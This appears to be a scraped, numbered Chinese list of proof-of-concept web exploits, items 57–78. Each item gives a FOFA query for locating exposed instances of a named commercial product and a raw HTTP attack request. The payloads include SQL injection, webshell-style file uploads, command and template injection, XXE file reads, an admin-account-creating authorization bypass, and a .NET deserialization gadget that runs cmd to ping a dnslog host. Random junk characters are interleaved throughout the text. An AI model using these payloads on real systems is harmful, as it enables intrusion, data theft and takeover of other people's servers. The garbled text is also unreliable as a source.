3 d1 {9 z3 V! s+ U8 F "storeID":{
8 ~1 ?! A% x m "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",4 R& S7 Q5 w' v2 N( F$ K' E( U3 M$ @
"MethodName":"Start",, T! l! e1 t- d9 @' X& n+ A- J
"ObjectInstance":{, n# q1 {1 a6 y/ L5 {* V
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* ?! c- s, |8 R5 \. Z. g% Q
"StartInfo": {9 C$ z0 O3 \' L) W! ?
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 g% E* y( W" [6 \- g8 T* [
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
. ]' c, w0 t2 ?1 Q6 p' q' Q/ D7 P }% B0 t2 I4 t" R- c
} s! U. v! n3 j3 P1 q. m
}
+ |3 E& {6 M* y" t/ ^}: X8 U) j5 f3 `0 A" l- K8 m
9 Z) H( C `+ P7 b! \6 L. j0 o- j4 E! v/ O1 ^" o9 u5 Y
57. 畅捷通T+ keyEdit.aspx SQL注入/ b( u# u/ H8 \8 {; m1 B$ l
FOFA:app="畅捷通-TPlus"1 r! K/ x5 w% B" _
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.15 t! U# x! J+ q( C7 P. Q) k
Host: host
+ H% C7 h2 C, }. q4 Q. T% i. bUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! [! V5 A1 k' h0 O
Accept-Charset: utf-8, \# E- T, y: p( q
Accept-Encoding: gzip, deflate
+ I8 j N6 P0 J7 B- ~8 K3 aConnection: close+ x% E3 t% f6 \
* t9 j. R: r: E( y$ ^, p
/ j# I, m3 Z* K5 X
58. 畅捷通T+ KeyInfoList.aspx sql注入0 S% x; c$ D2 f
FOFA:app="畅捷通-TPlus"
( O9 x3 \: N0 f; z2 G! _. TGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1; J/ u$ [$ |$ B s. B+ R" n. O
Host: your-ip
6 v' w/ B/ O/ f9 nUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 R" }8 n7 j$ E7 {( ~6 m1 c) vAccept-Charset: utf-8) r9 ]) O k. V4 M4 I: Y$ h
Accept-Encoding: gzip, deflate
! s. x# _3 K1 x/ N, |Connection: close( A$ e& N7 }8 ?& k6 ` b
) z) @( M5 f! g4 T% P
7 I2 o% ^: \) ^* e8 S
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
6 m: r# y3 E8 vFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
* I: y R$ p; s' r8 iPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.15 O: P6 @! G9 y: G/ X; v% X* V5 b
Host: 192.168.86.128:9090
- H0 a+ z# F$ N) I! b( RUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 j0 G' {* t1 O, \% Q V. i1 QConnection: close/ Z: b; F# V- ?: T" [
Content-Length: 1669
1 q( U# _2 N3 ]% FAccept: */*1 A# M6 Y, g% q% |& p
Accept-Language: en
: Q8 L* x! y; JContent-Type: application/x-www-form-urlencoded7 v* E* C/ X- v1 v6 ]; e
Accept-Encoding: gzip7 C% R; i8 ~6 }9 x9 H5 Z, t
9 r! J9 T3 b/ S. L! K G
PAYLOAD) X& _/ K+ [: ^4 V( Q. k% L
0 i* o! O5 i: B; U; f- v6 J
7 W/ B( }9 _! S, C' O0 {60. 百卓Smart管理平台 importexport.php SQL注入% t/ t \, @' K9 n# H
FOFA:title="Smart管理平台": a$ K7 A; i% s6 E4 e
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1' z+ i( C6 X, ]8 {, A8 j0 \
Host:
3 {4 K% q4 T) G4 s; |. m FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ A/ C8 X% Q. s4 q- d; G, sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 o, j! ^$ d+ R9 o- x; qAccept-Encoding: gzip, deflate, c- Z% \- W N
Accept-Language: zh-CN,zh;q=0.9# W( m) t: G7 V: Z% r8 F+ W
Connection: close
1 O3 z4 V% h: N5 q2 U& V! O/ J5 ?& E; ~/ c
1 @* D2 v* @+ [/ y& \1 f" ?
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 ^+ p% j5 r# a4 @3 c) GFOFA: title="欢迎使用浙大恩特客户资源管理系统"
3 I' b! y' T8 U- fPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1' u. r/ M* L9 i! d, G
Host: x.x.x.x. r2 v( X; T, X; X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 D, f; _6 b, x6 `
Connection: close+ L- j6 b2 E7 c
Content-Length: 27 u$ L/ {1 s8 j, |- D) x
Accept: */*
6 K8 y. {7 D6 X+ HAccept-Encoding: gzip, deflate
5 S* r! Y; c9 ]Accept-Language: en( s( P4 o: T; U8 x
Content-Type: application/x-www-form-urlencoded
3 F- g6 D9 Q2 g4 b+ E; r* u
5 ^: j% l& w9 Q2 M; ~8uxssX66eqrqtKObcVa0kid98xa
9 w9 p* Q8 M) n: Q' r! T; G( r% V
7 @) {5 [& q$ i( i z! V) `$ j9 [) i+ [1 F/ a- l6 q
62. IP-guard WebServer 远程命令执行
% K+ L$ f2 u# a0 W) [FOFA:"IP-guard" && icon_hash="2030860561"
3 t- Y9 y P3 ^9 y$ {) p1 v$ |GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1/ X6 U% |8 s# X" j) [, k9 n- H
Host: x.x.x.x
& m+ {: V! h3 PUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36, J) o- c* `( ~4 R# f4 T
Connection: close% Q" U4 e$ e/ n2 D: P& R P$ ~
Accept: */*1 c6 \/ ~3 n h7 ~& k
Accept-Language: en
* P) \, N/ n( Q4 b, ~Accept-Encoding: gzip
) C' V4 ]$ L' [& N5 ]# P- Y: s2 o( d' J5 e4 i5 i7 p$ J6 ?1 d
) r' u7 z- a. ?' Y, Q7 H访问
) p# |& ?9 d0 a% ~% B
; F& S- x$ c% ^& h, yGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: u# h) m' m' xHost: x.x.x.x% k, _" J( E) m; S
2 B1 H" M' K% m% l( T+ v& }0 n
+ a, ^. [& O7 V" K63. IP-guard WebServer任意文件读取
0 ?- ]4 E8 O5 d0 z. O4 BIP-guard < 4.82.0609.0
( e( o- r( S4 CFOFA:icon_hash="2030860561"8 K3 [' H( ]; A/ ^( L
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
! j! d& M, ]6 n' A0 rHost: your-ip
1 i5 O2 Y' N( `2 K( f j/ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% P+ I/ G. w% ^4 J* }1 r( OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- a$ V4 q) b7 m( D/ `
Accept-Encoding: gzip, deflate `# d7 {) l6 _/ V8 i( {
Accept-Language: zh-CN,zh;q=0.9
9 ~7 N1 h% c7 s- O) I" ?! VConnection: close
# E# p0 Q' {6 ^# D" G4 |( yContent-Type: application/x-www-form-urlencoded
6 O! D# D5 R' S7 b0 A
+ f9 O T& ~$ X. ~! D7 f' ^path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A3 G, I" x4 v8 J: ^9 h
; f N& x1 H1 m, p64. 捷诚管理信息系统CWSFinanceCommon SQL注入
! _, S& U: k5 J6 eFOFA:body="/Scripts/EnjoyMsg.js"5 n% H1 A" Q. K% @
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
7 B$ p& i" M8 t& @Host: 192.168.86.128:9001
0 x5 t) u) v0 AUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36# y+ ?/ R w; N8 ^! e5 N: Z0 `0 F
Connection: close
- m& O6 A* ?* U6 p" aContent-Length: 369 i, Z( |; N# g
Accept: */*
0 e$ E8 ~0 M, L( b8 c' m7 R! W- HAccept-Language: en3 p7 ^5 h% {( f4 a, O4 a8 |/ I L3 L
Content-Type: text/xml; charset=utf-8
8 h( l' C6 G; C3 H2 p7 }* f! uAccept-Encoding: gzip
. z3 F: f* q2 |8 N. C
' f' _: s5 N: @% ]: M<?xml version="1.0" encoding="utf-8"?>
# _, D: y y8 k- d- E7 q1 [<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ }+ D/ H5 n4 T- ~<soap:Body>
7 g* ^0 ~) b" Z! Z <GetOSpById xmlns="http://tempuri.org/">
7 \0 u- W0 n; _2 `( k; `# j5 [ <sId>1';waitfor delay '0:0:5'--+</sId>1 p2 t* a# z# d
</GetOSpById>$ }, |8 P* N$ s: s" N4 r
</soap:Body>( j& ~. U" d7 ]
</soap:Envelope>2 C& Z. R+ @0 h3 G' z: @
6 p7 c/ I+ F" d: w6 T$ X' z
7 t: ^2 @0 c" _9 s$ X/ G+ m$ d65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
) L L8 n" f5 d h' kFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"" N! W3 e! V0 K# J* d) u0 T/ ?
响应200即成功创建账号test123456/123456
- H1 ~* W& F1 W# r, l1 }POST /SystemMng.ashx HTTP/1.1
& E3 e6 I' s# F9 j4 _Host:
3 |% R" G$ ?7 p3 W; f" bUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)! b/ X- B6 U! I# G8 I
Accept-Encoding: gzip, deflate1 {7 O. i& m8 v- Y
Accept: */*6 O9 t# N3 b$ ~7 l2 V8 }; S
Connection: close: ]1 b0 d9 r7 \! f ?: }0 Z6 u: N
Accept-Language: en
; T( l) h T# L$ IContent-Length: 174
1 p3 K1 G2 h& ^) z8 o, m# g& d; y3 @5 @/ I9 F; ^' }7 r
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
$ }$ v8 u6 y3 F) l* B0 F, @4 P" j9 ^. g/ O
1 T; x$ d! } I7 `/ B
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
" O o# [; X a2 x/ i: iFOFA:app="万户ezOFFICE协同管理平台"0 b1 Q) s8 O+ f# n1 y* u& @
0 [( a% n( x+ b# x4 a
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.19 d: {8 K2 w" d1 s& o
Host: x.x.x.x
$ [3 c- J# i( v6 ]# R" \1 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% W# s9 [. X7 K/ a" U! T: BConnection: close8 w ~' p' O$ K E! x
Accept: */*# f0 s- O$ s' H$ N
Accept-Language: en* m7 d$ P0 Q8 d ^3 e$ h( `
Accept-Encoding: gzip
% O( ]& } g2 o' M' s* |
) ^2 I3 N. [* w' b8 r' j
! l9 g0 g! w6 d1 _* L* ?- R7 d第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
. B. P1 I1 b; u$ }3 u2 H! }8 e& F* j1 p5 `
67. 万户ezOFFICE wpsservlet任意文件上传
0 }( v& Z! f# H s. f5 ?! ZFOFA:app="万户网络-ezOFFICE"
$ c3 @0 f. E- I4 A2 e1 enewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ ^9 p) M# ?1 i8 `2 J2 f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1) N8 X4 I L5 Y
Host: x.x.x.x
! c5 i+ I& b( D* f8 R% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+ S6 Z/ L+ ]2 T( RContent-Length: 173 c' E" t9 Y6 s2 D" A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
; B, H: z7 J0 l8 s( _Accept-Encoding: gzip, deflate
# s) O; R% ], r5 z( B+ }4 o5 G$ XAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 `4 w* D' z9 V r
Connection: close
/ U% R) S; ^: i; }2 A, r% G* ?Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp$ N- W$ |9 U7 U0 b
DNT: 1
9 M# e0 t7 G( f( @0 _. YUpgrade-Insecure-Requests: 1
( w1 z1 v& s# n; Y1 y7 S" J. Y& H$ r% M" J7 d$ F
--ufuadpxathqvxfqnuyuqaozvseiueerp
3 s+ H2 \! O* M$ J1 Z; E1 L+ b) BContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! D, p2 d$ q# l. S; l. N. {/ W3 O
! E' ~4 _' O- s9 N4 X/ |1 A( v<% out.print("sasdfghjkj");%>
. H8 N& }: N* T* m) @/ D--ufuadpxathqvxfqnuyuqaozvseiueerp--
. t) _ y- H9 ~' j$ H3 a! U. l
1 {" l6 n5 q1 R9 a9 H2 x5 T4 K
6 _4 W" l/ a* B5 `6 H7 m. |7 k文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
6 D; S4 p& \& a- r) ]; A3 n* J9 F+ \% V; U7 Q8 }2 v6 Q
68. 万户ezOFFICE wf_printnum.jsp SQL注入
1 p: }" e! N% i8 ?& J. g; y$ |FOFA:app="万户ezOFFICE协同管理平台"
- M' k2 y! O- I$ }+ H' n$ PGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ k6 H0 p" E0 E; kHost: {{host}}, C3 |$ V$ B0 w0 E$ ~4 f: @& z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
: W7 G- y/ D+ ^ KAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 E9 {' J' Z; ^. U2 \' C
Accept-Encoding: gzip, deflate
+ O7 V, b0 O; Y+ [/ U1 a9 c( A' F4 JAccept-Language: zh-CN,zh;q=0.9* L! \. ~* i( \
Connection: close
8 [0 l& r" s# u5 W) O4 S$ Z! a7 J- F
6 V) Y1 D6 U0 R8 a4 m69. 万户 ezOFFICE contract_gd.jsp SQL注入
& w2 A2 E% p' u- e1 A# H+ _2 lFOFA:app="万户ezOFFICE协同管理平台"
5 h+ P. W3 e7 L8 g, aGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
7 Y1 W; z; p# U9 w5 F4 P& n kHost: your-ip
4 Y& A+ f# }7 d, aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' t# @3 l6 a6 |8 J' }9 B( N) _Accept-Encoding: gzip, deflate
6 F$ Z( R4 W$ P5 W0 BAccept: */*" l: Y) ?( N7 W& |
Connection: keep-alive
7 |! J: w4 `8 X
3 u$ P2 r# O- k6 G7 R9 J }+ r. a- i5 H, G
70. 万户ezEIP success 命令执行
_$ l3 ?( ^5 I8 t6 k' T9 zFOFA:app="万户网络-ezEIP"
( a0 y) ^' d* c1 U8 g/ R' Q- OPOST /member/success.aspx HTTP/1.1
. N$ Q# Q- k2 T5 a$ Q. r( dHost: {{Hostname}}
8 n1 K; e( H, V) [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) p- [* R6 ?# V8 V: h0 N* I. GSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=( o I1 f, B: h# b9 L+ I! S
Content-Type: application/x-www-form-urlencoded
- c0 n$ _8 e6 ATYPE: C
+ }9 f: E k6 m' n f1 I) f# f5 D; GContent-Length: 167029 N/ a- o* H9 g7 S0 z; q
4 Y) ]1 q# ~% F7 O7 F: P! `
__VIEWSTATE=PAYLOAD
; d9 d# k j1 Q( p% f# u$ j+ H3 l1 J' X& ?1 R% X/ P1 c! [, Z6 h
/ ?. V, K M0 P% D71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( m q$ v1 j+ e- \
FOFA:body="PM2项目管理系统BS版增强工具.zip"* S) b% Q/ ^, `) N
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
/ H8 d Y1 m, j$ iHost: x.x.x.xx.x.x.x
% I& F& ^3 b/ p8 M& ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36: n0 a* S" M- C0 c" ^
Connection: close
1 j1 Z( ]! t- w, l5 c4 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; L: v7 ~8 k5 v2 O3 x5 p" wAccept-Encoding: gzip, deflate- n& h" ~' L( Q; V$ K1 s- o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 K- z* l% h& L
Upgrade-Insecure-Requests: 1) s( N* |1 ~+ M/ j+ \0 C) E
- D2 v7 Q7 ?4 K9 Y' G# G
* B4 v h& V( P F' I" k" P
72. 致远OA getAjaxDataServlet XXE
9 F9 k4 y3 L9 [) A) v+ L" ^4 @FOFA:app="致远互联-OA"& S* v2 B2 T: B% ?
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.17 D! e; l7 v# m8 h/ W7 V
Host: 192.168.40.131:8099- o! Y0 X' P$ A4 I
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 I2 f r5 Z* Q9 F( m, b$ C0 ZConnection: close
! R* ~$ ]2 y' ^7 @0 o, _Content-Length: 583- O+ M" J# L8 [$ P! S
Content-Type: application/x-www-form-urlencoded( r, n& c0 Y# `; L/ {
Accept-Encoding: gzip
* }: S8 v" X+ k! f" i: a8 p# \; n! [! R2 l4 Y/ f
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E2 M' H: S* ?, T4 v1 S
- ?; m6 Y4 {/ c/ y# |
+ m7 J3 U' S; {5 \ _& w, \73. GeoServer wms远程代码执行 R4 O v6 }( J
FOFA:icon_hash=”97540678”
% v' p2 g" T0 y7 `POST /geoserver/wms HTTP/1.1
: v. n- `$ N5 f6 d4 v B' @5 lHost:3 E9 R% _: D9 `# x% j2 Y1 A) O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# U8 k" M* G P& w8 w6 t" y
Content-Length: 1981
+ B* {/ {0 V0 U8 x* U; wAccept-Encoding: gzip, deflate# q O+ c5 R8 _
Connection: close
& s9 e) \2 ^2 u e( t: sContent-Type: application/xml
& C( |- g6 M' J* M1 Q$ ySL-CE-SUID: 3! X0 o. I: L% z. E+ T' i
5 K3 e6 Q. ~4 P/ U* P P- b, O* YPAYLOAD
2 s/ D5 Z% M4 K* N1 q4 G1 `# i
$ G* {+ A4 e* m: \3 M+ Y0 e9 {% x( C' ?% e* X }
74. 致远M3-server 6_1sp1 反序列化RCE% P" C+ d. z, ]% R, D6 B
FOFA:title="M3-Server"- W v' ?, e( X8 y
PAYLOAD: X& r* a0 K0 t% W, |
& v' r2 _' E/ B/ b, i75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" v; [# Z" i& }& s" s
FOFA:app="TELESQUARE-TLR-2005KSH"
$ \: \+ s: c/ _! Y* \GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
( G7 ]4 H" ]& b3 {3 KHost: x.x.x.x7 t0 f7 j" q$ w2 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 K& K R7 h& _! LConnection: close$ }$ j; l0 t: I% s" k6 |
Accept: */*8 `% {* {- z4 u0 }2 j9 d+ O
Accept-Language: en; ~& x5 n6 Z% X# T0 K
Accept-Encoding: gzip' R2 P. K# A d$ w2 d
0 X; t: J0 {+ r
) Y) r- a" f/ u R/ WGET /cgi-bin/test28256.txt HTTP/1.17 b( _" I7 ]+ k1 e# w5 R0 g& t
Host: x.x.x.x
' ~ E( ?9 @- D: M+ }( @# U
' @# m7 T `7 M- y/ s; A$ \+ `9 {/ _& ]& s+ e6 U ~
76. 新开普掌上校园服务管理平台service.action远程命令执行
' M3 G* r5 \+ {9 u% C- yFOFA:title="掌上校园服务管理平台"
. o/ f5 Q7 n% X7 s& I4 gPOST /service_transport/service.action HTTP/1.1
( w, v- a% e6 _4 D( _+ S' RHost: x.x.x.x
2 V, ?: c- D [! `! W. J7 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
5 }3 M p' } @& ?Connection: close2 `5 c6 _+ a" |# S r
Content-Length: 211
! T+ j" ^5 @+ ]' u" BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 f' }1 c2 H3 iAccept-Encoding: gzip, deflate, p$ M a0 K8 C. }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 L5 ^# o G/ R4 e! R8 x
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4" l6 k8 [) L1 O" p" @9 F
Upgrade-Insecure-Requests: 1- E: A0 y7 j! K5 D4 D" h' w3 D3 }
6 F4 M7 N9 p: A h. \8 P{2 a+ `. P0 }4 `( i9 c; P! J
"command": "GetFZinfo",
' g1 g C+ j6 k$ M' O6 Z! y$ X- L "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
' D2 E: `- z" I3 T: l ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"4 Y3 Q" @/ B$ Q0 r2 ~
}0 B; i8 y: h9 V) ^. |
' |6 ^' b3 y+ c/ ?
% X8 ]% A. h0 kGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1! O* L) E# V4 r) S
Host: x.x.x.x
* e8 D/ ?3 O, l `( r+ H# s" y+ a) r8 Y1 l S
) t$ S+ C# l: Z: `0 q8 j3 \) f
% U9 f) y2 t, }$ o77. F22服装管理软件系统UploadHandler.ashx任意文件上传. F) C5 A$ p' e2 L: Y5 P
FOFA:body="F22WEB登陆") F8 [. ?1 Y$ S% R+ Z4 L
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.13 E" [* L# g* L
Host: x.x.x.x4 i0 R; s1 }% j* g! ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! v/ s0 ^& E r: P# g I" F2 P) [
Connection: close
6 H) k2 \8 m# V s) i9 I5 B8 MContent-Length: 433
" ^6 B4 U, ^7 Z8 C; fAccept: */*7 r$ Q1 g2 C* i3 m
Accept-Encoding: gzip, deflate
_" L2 C5 o* x8 \Accept-Language: zh-CN,zh;q=0.98 D9 ]) b& O6 {! c' w6 y
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
0 h8 G( ~0 }' A ]( v& W/ H" @ l3 q
' a$ O2 R* Q( i' ^6 f% I- B------------398jnjVTTlDVXHlE7yYnfwBoix
3 S! E$ M" Q* n Y5 Y0 wContent-Disposition: form-data; name="folder"
' h) A; j' {6 D8 J, \
; K2 V4 t n W$ {2 n6 `/upload/udplog4 @$ b% `2 U3 `0 [' b+ H. n) I
------------398jnjVTTlDVXHlE7yYnfwBoix- `! e& ?; p- p$ d- i, T8 X9 U
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"4 G4 b Z, w5 ]" V) N. v& L
Content-Type: application/octet-stream
3 N+ p, R8 b8 M" S* p$ I. {9 h& @2 e# s* e0 Q1 m6 ?6 A. t! Z
hello1234567
, S/ U" q( I' }' Q------------398jnjVTTlDVXHlE7yYnfwBoix
# Q* A8 q6 t0 S" S6 y2 m9 F7 m1 TContent-Disposition: form-data; name="Upload"
4 E+ e) _' ~* ]% n8 O- h
5 o8 p" w, G+ S- }Submit Query
) a7 M8 L" h+ W- [; ^------------398jnjVTTlDVXHlE7yYnfwBoix--
! ]/ O; u8 L- @0 x& Y! Z, z, j) D9 p
I/ j* v3 h$ [5 C
$ C% Q( ?2 y2 C' L4 U2 C0 O& X* b78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传: J" J3 `# G. @6 |8 _7 ?$ j9 C
FOFA:icon_hash="2001627082"
6 t2 R: Y$ c z! s/ XPOST /Platform/System/FileUpload.ashx HTTP/1.18 G. A( c4 O: c2 {1 w h
Host: x.x.x.x
+ q+ G6 X" y% {! _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ F5 Z) V% @! F; h4 [0 w7 ]" K
Connection: close; k$ k- c7 P: P) o
Content-Length: 336' \" y" e' e' s \
Accept-Encoding: gzip- r! S0 H3 [2 |/ o
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l% H! G3 I3 R' g" c
8 Y( }) \0 r4 D
------YsOxWxSvj1KyZow1PTsh98fdu6l
8 m/ R: H/ L" tContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
- W1 u! P0 p; y AContent-Type: image/png
" I3 U7 W$ U1 l
1 ]; d& x; D9 }4 B8 g: ?$ H4 ?YsOxWxSvj1KyZow1PTsh98fdu6l; s& x3 g: t1 H( ]6 z' e
------YsOxWxSvj1KyZow1PTsh98fdu6l
* U; y2 _2 c7 W5 Z- w. vContent-Disposition: form-data; name="target"
* A& |- e" ~$ j) }( p i( |# ~2 {: b5 ?- w
/Applications/SkillDevelopAndEHS/, x) }6 Z: i: X
------YsOxWxSvj1KyZow1PTsh98fdu6l--- |: ~- F6 u$ ]0 c1 l, [9 n9 H6 W
' a0 w5 d6 k: s$ p/ N+ k- s0 ~7 V k( b$ P' P1 e# L m
